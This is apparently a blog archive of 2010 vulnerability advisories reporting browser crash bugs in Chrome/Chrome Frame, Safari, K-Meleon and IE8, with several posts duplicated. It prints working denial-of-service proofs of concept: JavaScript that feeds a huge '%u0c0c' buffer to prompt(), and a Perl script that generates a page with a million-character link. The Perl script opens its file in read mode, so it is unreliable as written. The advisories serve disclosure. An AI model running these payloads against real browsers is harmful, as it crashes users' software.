###############################################
Google Chrome and Chrome frame Prompt DoS
Vendor URL: http://www.google.com
Advisore:http://lostmon.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Advosore spanish:http://rootdev.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Vendor notify: YES exploit available:YES
###############################################
This Bug was discoveres by me and i have tested it
and investigate with Climbo From #ayuda-informaticos
on irc-hispano channel.
#########
abstract
#########
Some times the web aplications need to Prompt some data to users,
it can prompt via javascript code , or via html forms ...
In the case of javascript prompts what´s happend if
the data to prompt ( the question) is very long ?¿
################
Google chrome is prone vulnerable to a Denial of service
condition via "alert prompts" wen the data expected is very long ...
i don´t know if this can be turn in a remote code execution or
memory corruption with some heap spray or similar but i think
that this need to be analyze & patch
###################
Versions Tested
###################
In all cases chrome is the vector to do
something in all systems :)
######################
MAC OS X leopard 10.5
######################
Google Chrome5.0.375.126 (Build oficial 53802) WebKit 533.4
V8 2.1.10.15
User Agent Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US)
AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4
Command Line /Applications/Google Chrome.app/Contents/MacOS/Google Chrome -psn_0_794818
In all cases OS X closes all Chrome Windows.( Chrome Crash)
##############
ubuntu 10.04
##############
Chromium 5.0.375.99 (Developer Build 51029) Ubuntu 10.04
WebKit 533.4
V8 2.1.10.14
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4
(KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4
Command Line /usr/lib/chromium-browser/chromium-browser
In al cases Chrome is minimized and denies the access to
"window manager button" and we can´t no change beetwen applications
that we have open.
##################
Windows 7 32 bits
###################
Google Chrome 5.0.375.86 (Build oficial 49890)
on windows 7 ultimate fully patched.
It causes a DoS in chrome and a DoS in IE8 when
exploit it across Google Chrome Frame.
###############
Debian 2.6.26
###############
Google Chrome 6.0.472.25 (Build oficial 55113) devWebKit 534.3
V82.2.24.11
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit 534.3
in all cases Debian Closes all chrome Windows.( Chrome Crash)
####################
Proof Of Concepts
####################
this PoC is for testing in win7 32 bits, chrome
and chrome frame in conjuncion with ie8 that causes
a DoS in ie8
#############################
<meta http-equiv="X-UA-Compatible" content="chrome=1">
<h1> wait 10 or 11 seconds :)</h1>
<script>
function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 38000);
prompt(buffer);
}
setTimeout('DoS()',1000);
</script>
################# EOF ###################
This second PoC is for test in Linux or in Mac OS X
#######################################
<h1> wait 10 or 11 seconds :)</h1>
<script>
function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 50000);
prompt(buffer);
}
setTimeout('DoS()',1000);
</script>
################# EOF ###################
############
References
############
related vuln:
http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html
Google chrome bugtrack:
http://code.google.com/p/chromium/issues/detail?id=47617
################### €nd ###################
Thnx To Climbo for his patience and support.
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Safari for windows Long link DoS
Wednesday, August 04, 2010
############################################
Safari for windows Long link DoS
Vendor URL:http://www.apple.com/safari/
Advisore:http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html
Vendor notified:Yes exploit available: YES
############################################
Safari is prone vulnerable to Dos with a very long Link...
This issue is exploitable via web links like <a href="very long URL">
click here</a> or similar vectors. Safari fails to render the link
and it turn Frozen resulting in a Denial of service condition.
#################
Versions Tested
#################
I have tested this issue in win xp sp3 and a windows 7 fully pached.
Win XP sp3:
Safari 5.0.X vulnerable
Safari 4.xx vulnerable
windows 7 Ultimate:
Safari 5.0.X vulnerable
Safari 4.xx vulnerable
############
References
############
Discovered: 29-07-2010
vendor notify:31-07-2010
Vendor Response:
Vendor patch:
####################
Proof Of Concept
####################
#######################################################################
#!/usr/bin/perl
# safari & k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS
# generate the file open it with safari wait a seconds
######################################################################
$archivo = $ARGV[0];
if(!defined($archivo))
{
print "Usage: $0 <archivo.html>\n";
}
$cabecera = "<html>" . "\n";
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n";
$fin = "</html>";
$datos = $cabecera . $payload . $fin;
open(FILE, '<' . $archivo);
print FILE $datos;
close(FILE);
exit;
################## EOF ######################
##############
Related Links
##############
vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776
###################### €nd #############################
Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Safari for windows Long link DoS
Vendor URL:http://www.apple.com/safari/
Advisore:http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html
Vendor notified:Yes exploit available: YES
############################################
Safari is prone vulnerable to Dos with a very long Link...
This issue is exploitable via web links like <a href="very long URL">
click here</a> or similar vectors. Safari fails to render the link
and it turn Frozen resulting in a Denial of service condition.
#################
Versions Tested
#################
I have tested this issue in win xp sp3 and a windows 7 fully pached.
Win XP sp3:
Safari 5.0.X vulnerable
Safari 4.xx vulnerable
windows 7 Ultimate:
Safari 5.0.X vulnerable
Safari 4.xx vulnerable
############
References
############
Discovered: 29-07-2010
vendor notify:31-07-2010
Vendor Response:
Vendor patch:
####################
Proof Of Concept
####################
#######################################################################
#!/usr/bin/perl
# safari & k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS
# generate the file open it with safari wait a seconds
######################################################################
$archivo = $ARGV[0];
if(!defined($archivo))
{
print "Usage: $0 <archivo.html>\n";
}
$cabecera = "<html>" . "\n";
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n";
$fin = "</html>";
$datos = $cabecera . $payload . $fin;
open(FILE, '<' . $archivo);
print FILE $datos;
close(FILE);
exit;
################## EOF ######################
##############
Related Links
##############
vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776
###################### €nd #############################
Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
K-Meleon for windows about:neterror Stack Overflow DoS
############################################
K-Meleon for windows about:neterror Stack Overflow DoS
Vendor URL:http://kmeleon.sourceforge.net/
Advisore:http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html
Vendor notified:Yes exploit available: YES
############################################
K-Meleon is an extremely fast, customizable, lightweight web browser
based on the Gecko layout engine developed by Mozilla which is also
used by Firefox. K-Meleon is free, open source software released under
the GNU General Public License and is designed specifically for
Microsoft Windows (Win32) operating systems.
K-Meleon is prone vulnerable to crashing with a very long URL...
Internal web pages like about:neterror does not limit the amount of
chars that a user put in 'c' 'd' params and them if we compose a
malformed url the browser can be chash easy.This issue is exploitable
via web links like click here or via
window.location.replace('very long url') or similar vectors.
#################
Versions Tested
#################
I have tested this issue in win xp sp3 and a windows 7 fully pached.
Win XP sp3:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes )
K-Meleon 1.6.0a4 Vulnerables.(crashes)
windows 7 Ultimate:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes)
K-Meleon 1.6.0a4 Vulnerables.(crashes)
############
References
############
Discovered: 29-07-2010
vendor notify:31-07-2010
Vendor Response:
Vendor patch:
########################
ASM code stack overflow
########################
################
#Proof Of Concept
################
#######################################################################
#!/usr/bin/perl
# k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS
# generate the file open it with k-keleon click in the link and wait a seconds
######################################################################
$archivo = $ARGV[0];
if(!defined($archivo))
{
print "Usage: $0 <archivo.html>\n";
}
$cabecera = "<html>" . "\n";
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n";
$fin = "</html>";
$datos = $cabecera . $payload . $fin;
open(FILE, '<' . $archivo);
print FILE $datos;
close(FILE);
exit;
################## EOF ######################
##############
Related Links
##############
vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776
###################### €nd #############################
Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
K-Meleon for windows about:neterror Stack Overflow DoS
Vendor URL:http://kmeleon.sourceforge.net/
Advisore:http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html
Vendor notified:Yes exploit available: YES
############################################
K-Meleon is an extremely fast, customizable, lightweight web browser
based on the Gecko layout engine developed by Mozilla which is also
used by Firefox. K-Meleon is free, open source software released under
the GNU General Public License and is designed specifically for
Microsoft Windows (Win32) operating systems.
K-Meleon is prone vulnerable to crashing with a very long URL...
Internal web pages like about:neterror does not limit the amount of
chars that a user put in 'c' 'd' params and them if we compose a
malformed url the browser can be chash easy.This issue is exploitable
via web links like click here or via
window.location.replace('very long url') or similar vectors.
#################
Versions Tested
#################
I have tested this issue in win xp sp3 and a windows 7 fully pached.
Win XP sp3:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes )
K-Meleon 1.6.0a4 Vulnerables.(crashes)
windows 7 Ultimate:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes)
K-Meleon 1.6.0a4 Vulnerables.(crashes)
############
References
############
Discovered: 29-07-2010
vendor notify:31-07-2010
Vendor Response:
Vendor patch:
########################
ASM code stack overflow
########################
################
#Proof Of Concept
################
#######################################################################
#!/usr/bin/perl
# k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS
# generate the file open it with k-keleon click in the link and wait a seconds
######################################################################
$archivo = $ARGV[0];
if(!defined($archivo))
{
print "Usage: $0 <archivo.html>\n";
}
$cabecera = "<html>" . "\n";
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n";
$fin = "</html>";
$datos = $cabecera . $payload . $fin;
open(FILE, '<' . $archivo);
print FILE $datos;
close(FILE);
exit;
################## EOF ######################
##############
Related Links
##############
vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776
###################### €nd #############################
Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
IE8 On windows 7 32 bits unspecified DoS
Tuesday, July 13, 2010
##########################################
IE8 On windows 7 32 bits unspecified DoS
Vendor URL:http://www.microsoft.com
Advisore:http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html
Vendor Notify:YES Vendor confirmed:YES
EXPLOIT:Private
###########################################
A posible flaw exits in Internet explorer 8
on windows 7 32-bits ,that can cause a remote
denial of service from a malformed web page.
This issue is tiggered when IE8 try to render
Modal app prompt in conjuncion with thirds appz that
uses recurses from IE8 and try to render text inputs
it is a posible GDI text-rendering
APIs bug or or DrawText() functions involved.
When the victim visit a malformed web page, an close the 2nd
appz, this appz turns unstable and needs to close , and then
when IE8 try to restore
the tab ,it los the focus from application and it results in
a denial of service to this window , because we can't click
in any bar , in any button or do some action in this window,
ie8 aparently is frozen.
After several test this issue only is reproducible in win7 32 bits
I have a exploit or PoC for this issue , but it's
private at this time :)
Solution:
Microsoft know that as a stability bug and they add it
for consideration in a future version to address it.
#################### €nd ##########################
Thnx for your time !!!
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
IE8 On windows 7 32 bits unspecified DoS
Vendor URL:http://www.microsoft.com
Advisore:http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html
Vendor Notify:YES Vendor confirmed:YES
EXPLOIT:Private
###########################################
A posible flaw exits in Internet explorer 8
on windows 7 32-bits ,that can cause a remote
denial of service from a malformed web page.
This issue is tiggered when IE8 try to render
Modal app prompt in conjuncion with thirds appz that
uses recurses from IE8 and try to render text inputs
it is a posible GDI text-rendering
APIs bug or or DrawText() functions involved.
When the victim visit a malformed web page, an close the 2nd
appz, this appz turns unstable and needs to close , and then
when IE8 try to restore
the tab ,it los the focus from application and it results in
a denial of service to this window , because we can't click
in any bar , in any button or do some action in this window,
ie8 aparently is frozen.
After several test this issue only is reproducible in win7 32 bits
I have a exploit or PoC for this issue , but it's
private at this time :)
Solution:
Microsoft know that as a stability bug and they add it
for consideration in a future version to address it.
#################### €nd ##########################
Thnx for your time !!!
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)
